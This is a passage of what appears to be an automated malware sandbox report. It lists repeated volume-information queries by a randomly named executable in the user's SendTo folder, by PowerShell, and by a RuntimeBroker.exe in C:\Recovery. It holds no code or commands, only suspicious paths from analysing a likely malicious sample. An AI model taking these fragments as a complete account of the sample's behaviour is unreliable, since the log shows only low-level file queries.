                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
